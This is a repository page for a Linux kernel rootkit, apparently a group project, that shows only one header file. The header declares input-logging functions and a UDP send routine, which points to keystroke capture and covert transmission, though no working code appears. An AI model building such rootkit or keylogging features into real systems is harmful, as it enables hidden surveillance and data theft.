linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs

inputlog.h (205B)


      1 #ifndef _GROUP7_INPUTLOG_H
      2 #define _GROUP7_INPUTLOG_H
      3 
      4 void send_udp(pid_t pid, struct file *, char *, int);
      5 void log_input(const char *, const char *);
      6 void unlog_input(void);
      7 
      8 #endif//_GROUP7_INPUTLOG_H